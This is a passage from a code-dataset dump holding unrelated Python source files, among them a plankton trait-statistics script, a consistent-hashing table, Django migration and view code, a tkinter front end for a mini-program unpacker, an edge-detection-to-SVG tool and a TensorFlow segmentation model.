to mg C\nmortality = np.log(mortality)\nallo_scal[\"m_Z\"] = -0.092 # value from Hirst_Kiorboe_2002\n\n########################\n# nutrient contents\nres_cont = pd.read_csv(\"empirical_data/uye_1989.csv\")\nres_cont = res_cont[[\"Length\", \"N\", \"C\", \"DW\"]]\nres_cont[\"N\"] /= 14.01 # convert grams to mol\nres_cont[\"C\"] /= 1000 # convert \\mug to mg\n#relative nutrient content\nres_cont[\"R_conc\"] = res_cont[\"N\"]\n\"\"\"\nif clearance == \"specific_fmax\":\n res_cont[\"R_conc\"] /= res_cont[\"C\"]\"\"\"\nres_cont = np.log(res_cont)\ns_res, i_res, r_res, p_res, std_res = linregress(res_cont[\"C\"],\n res_cont[\"R_conc\"])\n# s_res is not distinguishable from 0:\nif s_res -1.96*std_res < np.round(s_res) < s_res + 1.96*std_res:\n s_res = np.round(s_res)\n \n#raw_data[\"k_Z\"] = np.full(2, 0)\nallo_scal[\"k_Z\"] = s_res\n\nraw_data = pd.concat([raw_data, growth, clear, mortality], ignore_index = True)\n\n###############################################################################\n# empirically measured sizes\nallo_scal[\"size_Z\"] = 1\n\ncorr_theory = pd.DataFrame(np.full((len(zoop_traits),len(zoop_traits)), np.nan),\n index = zoop_traits, columns = zoop_traits)\nmean_zoop = pd.DataFrame(columns = zoop_traits, index = [1])\nstd_zoop = pd.DataFrame(columns = zoop_traits, index = [1])\nn_measurments = pd.DataFrame(np.full((len(zoop_traits), len(zoop_traits)), np.nan),\n index = zoop_traits, columns = zoop_traits)\n\nraw_data = raw_data.astype(float)\nfor i,trait in enumerate(zoop_traits):\n if trait == \"k_Z\":\n continue\n # remove outliers\n perc = np.nanpercentile(raw_data[trait], [25,75])\n iqr = perc[1]-perc[0]\n ind = ((raw_data[trait] > perc[0] - 1.5*iqr) &\n (raw_data[trait] < perc[1] + 1.5*iqr))\n raw_data.loc[~ind, trait] = np.nan\n \n \n mean_zoop[trait] = np.nanmean(raw_data[trait])\n std_zoop[trait] = np.nanstd(raw_data[trait])\n\nsize_var = np.nanvar(raw_data[\"size_Z\"])\nsize_std = np.nanstd(raw_data[\"size_Z\"])\n \nfor i,trait in enumerate(zoop_traits):\n corr_theory.loc[trait, trait] = 1\n for j, traitj in enumerate(zoop_traits):\n if i != j: # different traits\n corr_theory.loc[trait, traitj] = (allo_scal[trait]*allo_scal[traitj]\n *size_var\n /(std_zoop[trait]*std_zoop[traitj])).values[0]\n n_measurments.loc[trait, traitj] = np.sum(np.isfinite(\n raw_data[trait]*raw_data[traitj]))\n\ndef nan_linreg(x,y):\n x,y = raw_data[x].values, raw_data[y].values\n ind = np.isfinite(x*y)\n if np.sum(ind) == 0:\n return [0, 0, 0, 0, np.inf]\n return linregress(x[ind], y[ind])\n\nwith warnings.catch_warnings(record = True): \n # compute confidence interval of correlation based on empirical measurments\n corr_empirical = raw_data.corr()\n # convert to fisher z'\n fisher_z = np.arctanh(corr_empirical.values)\n # confidence interval\n alpha = 1.96 # 95% confidence \n alpha = np.array([-alpha, alpha]).reshape(-1,1,1)\n fisher_confidence = fisher_z + alpha/np.sqrt(n_measurments.values - 3)\n corr_confidence = np.tanh(fisher_confidence)\n \n # where not in confidence interval\n corr_zoop = corr_theory.copy()\n ind = (corr_zoopcorr_confidence[1])\n corr_zoop[ind] = corr_empirical\n \n\n\n###############################################################################\n# handle special cases for k_Z = mu_Z*q_min\n# average resource concentration per species\nq_mean = np.nanmean(res_cont[\"R_conc\"])\n\n# q_min = s*size_Z + noise, select variance of nois to have correct r_res\nvar_q_mean = size_var*(1+s_res**2*(1-r_res**2)/r_res**2)\nstd_zoop[\"k_Z\"] = np.sqrt(var_q_mean + std_zoop[\"mu_Z\"])\nq_min_q_mean = np.log(10) # ration between mean and min\nmean_zoop[\"k_Z\"] = q_mean + mean_zoop[\"mu_Z\"] - np.log(q_min_q_mean)\nmean_zoop[\"k_Z\"] = mean_zoop[\"k_Z\"] - np.log(uc[\"h_day\"]) # change units to hours\n\n# corelation between k_z and other parameters\n# k_Z = q_min * mu_Z combined correlation, mu_Z and q_min are uncorrelated\ntraitj = \"k_Z\"\nfor i, trait in enumerate(zoop_traits):\n if trait == \"k_Z\":\n continue\n corr_zoop.loc[trait, traitj] = (allo_scal[trait]*allo_scal[traitj]\n *size_var\n /(std_zoop[trait]*std_zoop[traitj])).values\n corr_zoop.loc[traitj, trait] = corr_zoop.loc[trait, traitj]\n\n# correlation between k_Z and maximum growth\ncorr_zoop.loc[\"k_Z\", \"mu_Z\"] = (std_zoop[\"mu_Z\"]/std_zoop[\"k_Z\"]).values\ncorr_zoop.loc[\"mu_Z\", \"k_Z\"] = (std_zoop[\"mu_Z\"]/std_zoop[\"k_Z\"]).values\n\n# increase growth rate of zooplankton, because of couple holling types\nmean_zoop[\"mu_Z\"] += np.log(10)\n# the base covariance matrix of phytoplankton\ncov_base = corr_zoop*std_zoop.values*std_zoop.values[0,:,np.newaxis]\n\n\n# zooplankton prefer phytoplankton that are about 40**-3 times smaller\n# we scale such that mean size zoop prefer mean sized phyto\nzoop_pref = (mean_zoop[\"size_Z\"] - (pt.mean_phyto[\"size_P\"]\n + np.log(uc[\"mum3_mg\"]))).values\n\n# this corresponds to zoop prefering 20**-3 times smaller\nnp.exp(zoop_pref)**(1/3)\n\n# variance of noise term\nsig_size_noise = np.sqrt(size_var - pt.size_var)\n\nif __name__ == \"__main__\":\n # plot distribution of zooplankton traits\n import matplotlib.pyplot as plt\n import generate_plankton as gp\n import plankton_growth as pg\n import warnings\n\n # generate communities\n n_coms = 5000\n r_phyto = 1\n traits = gp.generate_plankton(r_phyto, n_coms, evolved_zoop = False)\n\n env = gp.generate_env(n_coms)\n \n # compute maximum attained growth rate\n traits = gp.phytoplankton_equilibrium(traits, env)\n N = np.array([traits[\"R_star_n_res\"],\n traits[\"R_star_p_res\"], \n traits[\"N_star_P_res\"],\n np.full((n_coms, 1), 1e-5)]).T[0]\n traits[\"mu_Z_effective\"] = np.empty((n_coms,1))\n with warnings.catch_warnings(record = True):\n for i in range(n_coms):\n ti, envi, i= gp.select_i(traits, env, i)\n traits[\"mu_Z_effective\"][i] = pg.per_cap_plankton_growth(N[i],ti, envi)[-1]\n\n traits = np.array([traits[\"size_Z\"], traits[\"mu_Z_effective\"],\n traits[\"c_Z\"], traits[\"m_Z\"], traits[\"k_Z\"]])\n trait_names = [\"Size\", \"Growth\\n$\\mu_Z$\", \"Clearance\\n$c_Z$\", \"Mortality\\n$m_Z$\",\n \"Half\\nsaturation\\n$k_Z$\"]\n with warnings.catch_warnings(record = True):\n traits = np.log(traits.reshape(len(trait_names),-1)).T\n bins = 15\n \n n = len(zoop_traits)\n fig, ax = plt.subplots(n,n,figsize = (9,9), sharex = \"col\", sharey = \"row\")\n \n \n fs = 16\n s = 5\n \n for i in range(n):\n for j in range(n):\n if i>j:\n ax[i,j].scatter(traits[:300,j], traits[:300,i], s = 5,\n alpha = 0.1,\n color = \"blue\")\n ax[i,j].scatter(raw_data[zoop_traits[j]],\n raw_data[zoop_traits[i]],\n s = 3, color = \"orange\")\n else:\n ax[i,j].set_frame_on(False)\n ax[i,j].tick_params(axis = \"y\", colors = \"None\")\n ax[i,j].tick_params(axis = \"x\", colors = \"None\")\n ax_hist = fig.add_subplot(n,n,1 + (n+1)*i)\n\n ax_hist.hist(traits[:,i], bins, density = True, color = \"blue\")\n ax_hist.set_xticklabels([])\n ax_hist.set_yticklabels([])\n ax_hist.set_title(trait_names[i], fontsize = fs)\n if (zoop_traits[i] != \"k_Z\"):\n ax_hist.hist(raw_data[zoop_traits[i]], bins, density = True,\n alpha = 0.5, color = \"orange\")\n ax[i,0].set_ylabel(trait_names[i], fontsize = fs, rotation = 0,\n ha = \"right\", va = \"center\")\n ax[-1,i].set_xlabel(trait_names[i], fontsize = fs)\n \n ax[-1,i].set_xticks(np.round(np.nanpercentile(traits[:,i],[5,95]),1))\n ax[i,0].set_yticks(np.round(np.nanpercentile(traits[:,i],[5,95]),1))\n \n \n \n \n ax[0,0].set_ylim(ax[0,0].get_xlim())\n ax[-1,-1].set_xlim(ax[-1,-1].get_ylim())\n\n fig.savefig(\"Figure_zooplankton_traits.pdf\")","sub_path":"zoop_traits.py","file_name":"zoop_traits.py","file_ext":"py","file_size_in_byte":9829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"179503587","text":"import uuid\n\nclass SourceStockBO(object):\n\n def __init__(self):\n self.secu_id = ''\n self.isin = ''\n self.record_update_time = ''\n self.secu_chinese_name = ''\n self.secu_english_name = ''\n self.secu_base_id = ''\n self.exch_type = ''\n self.secu_type = ''\n self.secu_sub_type = ''\n self.currency = ''\n self.bond_par_value = 0.0\n self.not_list_stkqty = ''\n self.last_trade_date = ''\n self.list_date = ''\n self.product_set_id = ''\n self.buy_unit = 0\n self.sell_unit = 0\n self.trade_low_limit = 0\n self.trade_high_limit = 0\n self.pre_close_price = 0.0\n self.tick_price = 0.0\n self.price_limit_type = ''\n self.price_high_limit = 0.0\n self.price_low_limit = 0.0\n self.ex_right_ratio = 0.0\n self.dividend_price = 0.0\n self.financing_flag = ''\n self.margin_flag = ''\n self.secu_status = ''\n self.memo = ''\n self.uuid = str(uuid.uuid1())\n self.boid = 1501\n self.destination = \"fstp.ace.rds.source.stock\"\n","sub_path":"fstp-python/com/purefun/fstp/core/bo/model/SourceStockBO.py","file_name":"SourceStockBO.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"627806016","text":"import hashlib\nimport binascii\nimport bisect\n\n\nclass SimpleConsistentHashTable(object):\n def __init__(self, nodelist):\n \"\"\"Initialize a consistent hash table for the given list of nodes\"\"\"\n baselist = [(hashlib.md5(str(node).encode('utf-8')).digest(), node) for node in nodelist]\n # Build two lists: one of (hashvalue, node) pairs, sorted by\n # hashvalue, one of just the hashvalues, to allow use of bisect.\n self.nodelist = sorted(baselist, key=lambda x: x[0])\n self.hashlist = [hashnode[0] for hashnode in self.nodelist]\n\n def find_nodes(self, key, count=3, avoid=None):\n \"\"\"Return a list of count nodes from the hash table that are\n consecutively after the hash of the given key, together with\n those nodes from the avoid collection that have been avoided.\n\n Returned list size is <= count, and any nodes in the avoid collection\n are not included.\"\"\"\n if avoid is None: # Use an empty set\n avoid = set()\n # Hash the key to find where it belongs on the ring\n hv = hashlib.md5(str(key).encode('UTF-8')).digest()\n # Find the node after this hash value around the ring, as an index\n # into self.hashlist/self.nodelist\n initial_index = bisect.bisect(self.hashlist, hv)\n next_index = initial_index\n results = []\n avoided = []\n while len(results) < count:\n if next_index == len(self.nodelist): # Wrap round to the start\n next_index = 0\n node = self.nodelist[next_index][1]\n if node in avoid:\n if node not in avoided:\n avoided.append(node)\n else:\n results.append(node)\n next_index = next_index + 1\n if next_index == initial_index:\n # Gone all the way around -- terminate loop regardless\n break\n return results\n\n def __str__(self):\n return \",\".join([\"(%s, %s)\" %\n (binascii.hexlify(nodeinfo[0]), nodeinfo[1])\n for nodeinfo in self.nodelist])\ndef preference_list(bucket_name):\n nodeList = ['172.18.16.38', '172.18.16.47', '172.18.16.86', '172.18.16.123']\n sch = SimpleConsistentHashTable(nodeList)\n #data = \"hiiii\"\n #input_key = hashlib.md5(str(data).encode('utf-8')).digest()\n x = sch.find_nodes(bucket_name)\n return x,nodeList\n #print(sch.hashlist)","sub_path":"REST_SERVER_SRC/consistentHashing.py","file_name":"consistentHashing.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465382389","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('threefeatures', '0028_auto_20151010_2140'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Ucretsiz_Hizmet_Talepleri',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('uye_istek', models.CharField(max_length=50, verbose_name='Talep Eden Üye')),\n ('talep_edilen_hizmet', models.CharField(max_length=20, verbose_name='Talep Edilen Hizmet')),\n ('talep_tarih', models.DateTimeField(verbose_name='Talep Tarihi', auto_now=True)),\n ('talep_sonuc', models.CharField(max_length=25, verbose_name='Talep Durumu', choices=[('0', 'Onaylanmamış'), ('1', 'Talep kabul edildi.'), ('2', 'Talep reddedildi.')])),\n ],\n options={\n 'verbose_name_plural': 'Ücretsiz Hizmet Talepleri',\n 'verbose_name': 'Ücretsiz Hizmet Talebi',\n },\n ),\n migrations.CreateModel(\n name='Ucretsiz_Hizmetler',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('tur', models.CharField(max_length=20, choices=[('0', 'Afiş'), ('1', 'Animasyon'), ('2', 'Intro')])),\n ('foto_video', models.FileField(upload_to='assets/images/ucretsizler/', verbose_name='Fotoğraf/Video')),\n ('aciklama', models.CharField(max_length=150)),\n ],\n options={\n 'verbose_name_plural': 'Ücretsiz Hizmetler',\n 'verbose_name': 'Ücretsiz Hizmet',\n },\n ),\n ]\n","sub_path":"threefeatures/migrations/0029_ucretsiz_hizmet_talepleri_ucretsiz_hizmetler.py","file_name":"0029_ucretsiz_hizmet_talepleri_ucretsiz_hizmetler.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250535237","text":"def solution(board):\n return bfs(board)\n\n\n# 건설하려는 도로가 이미 건설된 도로보다 비용이 적을 때 건설할 수 있다.\ndef bfs(board):\n costs = [[[987654321, 987654321] for i in range(len(board))] for i in range(len(board))]\n costs[0][0] = [0, 0]\n q = [[0, 0, 0], [0, 0, 1]] # [row, col, direction] direction - 0: 수평이동, 1: 상하이동\n direction = [[0, -1], [0, 1], [-1, 0], [1, 0]] # 좌우: 0, 상하: 1\n\n while q:\n current = q.pop(0)\n for i, d in enumerate(direction):\n n_row = current[0] + d[0]\n n_col = current[1] + d[1]\n if n_row < 0 or n_col < 0 or n_row >= len(board) or n_col >= len(board) or board[n_row][n_col]: continue\n \n n_cost = costs[current[0]][current[1]][current[2]] + 100\n if current[2]:\n n_cost += 500 if not i // 2 else 0 # 상하, 좌우이동하면 코너\n else: \n n_cost += 500 if i // 2 else 0 # 수평, 상하이동하면 코너\n \n # 다음 구간이 원래 구간보다 비용이 더 크면 건설X\n if n_cost > costs[n_row][n_col][i // 2]: continue\n\n costs[n_row][n_col][i // 2] = n_cost\n q.append([n_row, n_col, i // 2])\n \n for c in costs:\n print(c)\n print('-------------------------------')\n return min(costs[-1][-1])\n\n\nprint(solution([[0,0,0,0,0,0],[0,1,1,1,1,0],[0,0,1,0,0,0],[1,0,0,1,0,1],[0,1,0,0,0,1],[0,0,0,0,0,0]]))","sub_path":"prev/2020_kakao_intership/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"501931937","text":"import os\nimport cv2\n\nAnnotation_path = ('../Annotations_val')\nImage_path = ('../Images_val')\n\n\nf = [os.path.join(root, name) for root, dirs, files in os.walk('.') \\\n for name in files]\n\nclass_with_picname = [(_f.split('/')[1], _f.split('/')[-1][:-4]) for _f in f]\n\nf_with_class_with_picname = zip(f, class_with_picname)\n\nfor p, t in f_with_class_with_picname:\n print(p)\n clsf, pic_name = t\n cvimg = cv2.imread(p)\n cv2.imwrite(os.path.join(Image_path, pic_name + '.jpg'), cvimg)\n with open(os.path.join(Annotation_path, pic_name + '.txt'), 'w') as f:\n f.write(str(clsf).replace('_', '\\n') + '\\n') # File name just like 'gun_person', if one pic own many category.\n\nif __name__ == \"__main__\":\n for a in f_with_class_with_picname:\n print(a)\n","sub_path":"ValueImages/foreground_to_label.py","file_name":"foreground_to_label.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24934946","text":"\nfrom django.shortcuts import redirect, render\nfrom blog.forms import ContactForm\nfrom blog.models import ContactModel\n\n\ndef contact(request):\n form = ContactForm(initial={\n 'fullname': 'Elmar'\n })\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n contact.save()\n return redirect('homepage')\n context = {\n 'form': form,\n }\n return render(request, 'pages/contact.html', context=context)\n","sub_path":"blog/views/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"432684004","text":"from os import path\nimport os\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename\n\npwd = os.getcwd()\n\ndef selectPath():\n path_ = askopenfilename()\n path.set(path_)\n\n\n\n# def savepath():\n# path_ = askopenfilename()\n# save = path.set(path_)\n\n\n\ndef fanbianyi():\n os.system(\"node\"+\" \"+pwd+\"\\wxappUnpacker-master\\wuWxapkg.js\"+\" \"+ path.get())\n # print(path.get()[:-7])\n\n\nroot = Tk()\npath = StringVar()\n\n\nLabel(root, text=\"目标路径\").grid(row=0, column=0)\nEntry(root, textvariable=path).grid(row=0, column=1)\nButton(root, text=\"文件路径\", command=selectPath).grid(row=0, column=2)\n# Label(root, text=\"保存\").grid(row=1, column=0)\n# Entry(root, textvariable=save).grid(row=1, column=1)\n# Button(root, text=\"保存路径\", command=selectPath).grid(row=1, column=2)\nButton(root, text=\"确定\", command=fanbianyi).grid(row=2, column=1)\n\n\nroot.mainloop()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170105837","text":"import cv2 as cv\nfrom PIL import Image\nimport numpy as np\nfrom sklearn.cluster import MiniBatchKMeans\nfrom matplotlib.pyplot import imsave\nimport matplotlib.pyplot as plt\nimport os\nimport glob\n\n\n\"\"\"\nTakes in a single file from the InputImages folder and creates a single file output in the Outputs folder.\n\nProcessing takes any almost black pixels from the original and draws the coordinates on top of this canvas.\nI do this as some input images already have a black outline around some parts of the image. The result is then that CED creates a cavity edge\naround this black outline and it looks unpleasant.\n\nThis file uses:\ncluster size 7 which is chosen arbitrarily.\nkernel_size which is calculated from the number of unique colours. The logic being that an image with lots of unique colours\nwill require more blurring, and hence a bigger kernel size is preferred.\n\n\"\"\"\n\n\nclass Canny:\n def __init__(self, name, clusters, scalar):\n self.file_name = name\n self.imag = Image.open(f'InputImages/{self.file_name}')\n self.gray = cv.cvtColor(np.array(self.imag), cv.COLOR_BGR2GRAY)\n thresh, self.bw = cv.threshold(self.gray, 20, 255, cv.THRESH_BINARY)\n self.clusters = clusters\n self.height, self.width = self.imag.size\n self.scalar = scalar\n\n def calculate_filter_size(self):\n # We calculate the number of unique colours to determine the kernel_size. An image with a lot of unique\n # colours requires more blurring, which is achieved with a bigger kernel_size.\n unique_colors = set()\n for i in range(self.imag.size[0]):\n for j in range(self.imag.size[1]):\n pixel = self.imag.getpixel((i, j))\n unique_colors.add(pixel)\n\n filter_size = int(str(round(len(unique_colors), -3))[0])\n\n # Filter size needs to be odd. Sometimes I forget and put an even filter size. This will catch this error and\n # reduce it by one to make it odd again.\n if filter_size % 2 == 0:\n filter_size = max(5, filter_size + 1)\n\n else:\n filter_size = max(5, filter_size)\n\n return filter_size\n\n def k_means(self):\n # Resize the image in the hopes that kmeans and contours can find the edges easier.\n # This also reduces computational load.\n w, h = self.imag.size\n if w > 1000:\n h = int(h * 1000. / w)\n w = 1000\n imag = self.imag.resize((w, h), Image.NEAREST)\n\n # Dimension of the original image\n cols, rows = imag.size\n\n # Flatten the image with the new dimensions.\n imag = np.array(imag).reshape(rows * cols, 3)\n\n # Implement k-means clustering to form k clusters\n kmeans = MiniBatchKMeans(n_clusters=self.clusters)\n kmeans.fit(imag)\n\n # Replace each pixel value with its nearby centroid\n compressed_image = kmeans.cluster_centers_[kmeans.labels_]\n compressed_image = np.clip(compressed_image.astype('uint8'), 0, 255)\n\n # Reshape the image to original dimension\n self.compressed_image = compressed_image.reshape(rows, cols, 3)\n print(type(self.compressed_image))\n\n\n def median(self):\n\n self.compressed_image = cv.resize(self.compressed_image,\n dsize=(self.height * self.scalar, self.width * self.scalar),\n interpolation=cv.INTER_NEAREST)\n\n filter_size = self.calculate_filter_size()\n self.median = cv.medianBlur(self.compressed_image, filter_size)\n\n def auto_canny(self, sigma=0.33):\n self.canny = cv.cvtColor(self.median, cv.COLOR_RGB2GRAY)\n\n # compute the median of the single channel pixel intensities\n v = np.median(self.canny)\n # apply automatic Canny edge detection using the computed median\n lower = int(max(0, (0.3 - sigma) * v))\n upper = int(min(255, (0.8 - sigma) * v))\n\n self.edged = cv.Canny(self.canny, lower, upper, L2gradient=True)\n\n\n def draw_contours(self):\n contours, hierarchy = cv.findContours(self.edged, cv.RETR_CCOMP, cv.CHAIN_APPROX_TC89_L1)\n\n\n with open(f'{self.file_name.split(\".\")[0]}.svg', \"w+\") as f:\n f.write(f'')\n\n for c in contours:\n f.write('')\n f.write(f'')\n\n\nfile_name = \"gohan2\"\n\npic = Canny(name=f'{file_name}.jpg', clusters=7, scalar=1)\npic.k_means()\npic.median()\npic.auto_canny()\npic.draw_contours()\n","sub_path":"PythonScripts/SingleFileLocalPython.py","file_name":"SingleFileLocalPython.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"467891135","text":"\"\"\"A test python binary which reads a data file and runs a data binary.\"\"\"\nimport os\nimport subprocess\nimport sys\n\nfrom absl import app\nfrom absl import flags\n\nfrom phd.lib.labm8 import bazelutil\n\n\nFLAGS = flags.FLAGS\n\nDATA_FILE = bazelutil.DataPath('phd/learn/bazel/data_file.txt')\nDATA_BINARY = bazelutil.DataPath('phd/learn/bazel/data_binary')\n\n\ndef main(argv):\n \"\"\"Main entry point.\"\"\"\n if len(argv) > 1:\n raise app.UsageError('Unrecognized command line flags.')\n print('Hello from python', sys.executable)\n print('Sanboxed?', bazelutil.IsBazelSandbox())\n print('File location:', __file__)\n print('Current working directory:', os.getcwd())\n with open(DATA_FILE) as f:\n print('Data file:', f.read().rstrip())\n p = subprocess.Popen([DATA_BINARY], stdout=subprocess.PIPE,\n universal_newlines=True)\n stdout, _ = p.communicate()\n print('Data binary:', stdout.rstrip())\n\n\nif __name__ == '__main__':\n app.run(main)\n","sub_path":"learn/bazel/python_binary.py","file_name":"python_binary.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566759825","text":"import cslab_environ\n\nfrom utils import logger\nfrom utils.grad_clip_optim import GradientClipOptimizer\nimport h5py\nimport image_ops as img\nimport nnlib as nn\nimport numpy as np\nimport tensorflow as tf\n\nimport ris_model_base as base\n\nlog = logger.get()\n\n\ndef _get_idx_mask(idx, timespan):\n \"\"\"Computes the binary mask given an index.\n\n Args:\n idx: [B]\n\n Returns:\n mask: [B, T]\n \"\"\"\n eye = tf.constant(np.eye(timespan, dtype='float32'))\n return tf.gather(eye, idx)\n\n\ndef get_model(opt, device='/cpu:0'):\n \"\"\"The attention model\"\"\"\n model = {}\n\n timespan = opt['timespan']\n inp_height = opt['inp_height']\n inp_width = opt['inp_width']\n inp_depth = opt['inp_depth']\n padding = opt['padding']\n\n cnn_filter_size = opt['cnn_filter_size']\n cnn_depth = opt['cnn_depth']\n cnn_pool = opt['cnn_pool']\n dcnn_filter_size = opt['dcnn_filter_size']\n dcnn_depth = opt['dcnn_depth']\n dcnn_pool = opt['dcnn_pool']\n\n wd = opt['weight_decay']\n use_bn = opt['use_bn']\n segm_loss_fn = opt['segm_loss_fn']\n base_learn_rate = opt['base_learn_rate']\n learn_rate_decay = opt['learn_rate_decay']\n steps_per_learn_rate_decay = opt['steps_per_learn_rate_decay']\n gt_segm_noise = opt['gt_segm_noise']\n clip_gradient = opt['clip_gradient']\n fixed_order = opt['fixed_order']\n if 'add_skip_conn' in opt:\n add_skip_conn = opt['add_skip_conn']\n else:\n add_skip_conn = False\n\n rnd_hflip = opt['rnd_hflip']\n rnd_vflip = opt['rnd_vflip']\n rnd_transpose = opt['rnd_transpose']\n rnd_colour = opt['rnd_colour']\n\n############################\n# Input definition\n############################\n with tf.device(base.get_device_fn(device)):\n # Input image, [B, H, W, D]\n x = tf.placeholder('float', [None, inp_height, inp_width, inp_depth],\n name='x')\n x_shape = tf.shape(x)\n num_ex = x_shape[0]\n\n # Groundtruth segmentation, [B, T, H, W]\n y_gt = tf.placeholder('float', [None, timespan, inp_height, inp_width],\n name='y_gt')\n\n # Groundtruth confidence score, [B, T]\n s_gt = tf.placeholder('float', [None, timespan], name='s_gt')\n\n # Order in which we feed in the samples\n order = tf.placeholder('int32', [None, timespan], name='order')\n\n # Whether in training stage.\n phase_train = tf.placeholder('bool', name='phase_train')\n phase_train_f = tf.to_float(phase_train)\n\n model['x'] = x\n model['y_gt'] = y_gt\n model['s_gt'] = s_gt\n model['phase_train'] = phase_train\n model['order'] = order\n\n # Global step\n global_step = tf.Variable(0.0, name='global_step')\n\n###############################\n# Random input transformation\n###############################\n x, y_gt = img.random_transformation(\n x, y_gt, padding, phase_train,\n rnd_hflip=rnd_hflip, rnd_vflip=rnd_vflip,\n rnd_transpose=rnd_transpose, rnd_colour=rnd_colour)\n model['x_trans'] = x\n model['y_gt_trans'] = y_gt\n\n############################\n# Canvas: external memory\n############################\n canvas = tf.zeros(tf.pack([num_ex, inp_height, inp_width, 1]))\n cnn_inp_depth = inp_depth + 1\n\n###########################\n# CNN definition\n###########################\n cnn_filters = cnn_filter_size\n cnn_nlayers = len(cnn_filters)\n cnn_channels = [cnn_inp_depth] + cnn_depth\n cnn_act = [tf.nn.relu] * cnn_nlayers\n cnn_use_bn = [use_bn] * cnn_nlayers\n cnn = nn.cnn(cnn_filters, cnn_channels, cnn_pool, cnn_act,\n cnn_use_bn, phase_train=phase_train, wd=wd,\n scope='cnn', model=model)\n h_cnn = [None] * timespan\n h_cnn_last = [None] * timespan\n\n#############################\n# DCNN definition\n#############################\n dcnn_filters = dcnn_filter_size\n dcnn_nlayers = len(dcnn_filters)\n dcnn_unpool = dcnn_pool\n dcnn_act = [tf.nn.relu] * (dcnn_nlayers - 1) + [tf.sigmoid]\n dcnn_channels = [cnn_channels[-1]] + dcnn_depth\n dcnn_use_bn = [use_bn] * dcnn_nlayers\n if add_skip_conn:\n dcnn_skip_ch = [0] + cnn_channels[::-1][1:]\n else:\n dcnn_skip_ch = None\n dcnn = nn.dcnn(dcnn_filters, dcnn_channels, dcnn_unpool,\n dcnn_act, use_bn=dcnn_use_bn, skip_ch=dcnn_skip_ch,\n phase_train=phase_train, wd=wd, model=model,\n scope='dcnn')\n h_dcnn = [None] * timespan\n h_dcnn_last = [None] * timespan\n\n##########################\n# Segmentation output\n##########################\n y_out = [None] * timespan\n segm_gt = [None] * timespan\n segm_gt[0] = tf.reduce_sum(y_gt, [1])\n\n##########################\n# Computation graph\n##########################\n for tt in xrange(timespan):\n # Attended patch [B, A, A, D]\n cnn_inp = tf.concat(3, [x, canvas])\n\n # CNN [B, A, A, D] => [B, RH2, RW2, RD2]\n h_cnn[tt] = cnn(cnn_inp)\n h_cnn_last[tt] = h_cnn[tt][-1]\n\n # DCNN\n if add_skip_conn:\n skip = [None] + h_acnn[tt][::-1][1:] + [x_patch[tt]]\n else:\n skip = None\n h_dcnn[tt] = dcnn(h_cnn_last[tt], skip=skip)\n h_dcnn_last[tt] = h_dcnn[tt][-1]\n\n # Output\n y_out[tt] = tf.reshape(\n h_dcnn_last[tt], [-1, 1, inp_height, inp_width])\n\n # Canvas\n if fixed_order:\n _y_out = y_gt[:, tt, :, :]\n else:\n mask = _get_idx_mask(order[:, tt], timespan)\n mask = tf.expand_dims(tf.expand_dims(mask, 2), 3)\n _y_out = tf.reduce_sum(mask * y_gt, 1)\n\n _y_out_exp = tf.expand_dims(_y_out, 3)\n # Add independent uniform noise to groundtruth.\n _noise = tf.random_uniform(\n tf.pack([num_ex, inp_height, inp_width, 1]),\n 0, gt_segm_noise)\n _y_out_noise = _y_out_exp - _y_out_exp * _noise\n canvas += _y_out_noise\n if tt < timespan - 1:\n segm_gt[tt + 1] = segm_gt[tt] - _y_out\n\n#########################\n# Model outputs\n#########################\n y_out = tf.concat(1, y_out)\n model['y_out'] = y_out\n segm_gt = tf.concat(1, [tf.expand_dims(ss, 1) for ss in segm_gt])\n model['segm_gt'] = segm_gt\n\n#########################\n# Loss function\n#########################\n y_gt_shape = tf.shape(y_gt)\n num_ex_f = tf.to_float(y_gt_shape[0])\n max_num_obj = tf.to_float(y_gt_shape[1])\n\n##############################\n# Segmentation loss\n##############################\n # Matching\n identity_match = base.get_identity_match(num_ex, timespan, s_gt)\n iou_soft = base.f_iou(y_out, segm_gt, pairwise=False)\n iou_soft *= s_gt\n # iou_soft = tf.Print(iou_soft, [iou_soft, tf.shape(iou_soft), tf.reduce_max(segm_gt)])\n match = identity_match\n model['match'] = match\n match_sum = tf.reduce_sum(match, reduction_indices=[2])\n match_count = tf.reduce_sum(match_sum, reduction_indices=[1])\n match_count = tf.maximum(1.0, match_count)\n\n # IOU (soft)\n iou_soft_mask = iou_soft\n iou_soft = tf.reduce_sum(iou_soft_mask, [1])\n iou_soft = tf.reduce_sum(iou_soft / match_count) / num_ex_f\n model['iou_soft'] = iou_soft\n\n if segm_loss_fn == 'iou':\n segm_loss = -iou_soft\n else:\n raise 